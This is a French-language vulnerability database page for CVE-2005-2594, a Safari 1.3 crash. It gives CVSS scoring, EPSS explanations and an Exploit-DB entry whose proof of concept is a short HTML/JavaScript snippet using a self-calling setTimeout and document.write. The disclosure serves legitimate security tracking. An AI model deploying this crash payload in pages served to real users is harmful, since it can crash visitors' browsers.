CVE-2005-2594 : Détail

CVE-2005-2594

0.83%V3
Network
2005-08-17
04h00 +00:00
2024-09-17
04h13 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Apple Safari 1.3 (132) on Mac OS X 1.3.9 allows remote attackers to cause a denial of service (crash) via certain Javascript, possibly involving a function that defines a handler for itself within the function body.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 5 AV:N/AC:L/Au:N/C:N/I:N/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 26128

Date de publication : 2005-08-08 22h00 +00:00
Auteur : Patrick Webster
EDB Vérifié : Yes

source: https://www.securityfocus.com/bid/14528/info Apple Safari Web Browser is prone to a vulnerability that may result in a browser crash. This issue is exposed when the browser performs certain JavaScript operations. The exact cause of this issue is currently unknown. This BID will be updated as further information is disclosed. This vulnerability allows remote attackers to crash affected Web browsers by causing an invalid memory access exception. Safari version 1.3 is reported susceptible to this issue. Other versions may also be affected. <html> <script name="JavaScript"> <!-- function tickTock() { setTimeout("tickTock()", 1000); thisTime = new Date() seconds = thisTime.getSeconds() document.write(seconds); } // --> </script> <body onLoad="tickTock();"> </html>

Products Mentioned

Configuraton 0

Apple>>Safari >> Version 1.3

Références

http://www.securityfocus.com/archive/1/407702
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.securityfocus.com/bid/14528
Tags : vdb-entry, x_refsource_BID